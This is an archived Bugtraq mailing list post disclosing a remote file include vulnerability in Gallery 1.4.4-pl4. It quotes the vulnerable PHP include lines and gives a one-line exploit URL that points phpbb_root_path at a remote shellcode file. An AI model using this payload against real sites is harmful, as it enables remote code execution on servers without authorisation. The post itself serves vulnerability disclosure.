Bugtraq mailing list archives
Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability
From: "me you" <r.5.7 () hotmail com>
Date: Tue, 16 Jan 2007 13:52:57 +0000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability Script : Gallery Version : 1.4.4-pl4URL : http://puzzle.dl.sourceforge.net/sourceforge/gallery/gallery-1.6-alpha3.tar.gz
Author : BorN To K!LL
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Code in :. contrib/phpBB2/modules.php
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.'.$phpEx);
include_once($phpbb_root_path . 'includes/functions.'.$phpEx);
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Explo!t :.
^^^^^
www.site.com/[path]/contrib/phpBB2/modules.php?phpbb_root_path=shellcode.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GreeTz to : Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke
...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _________________________________________________________________Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/
Current thread:
- Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability me you (Jan 16)
- Re: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability Chris Kelly (Jan 16)
- <Possible follow-ups>
- Re: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability krasza (Jan 16)
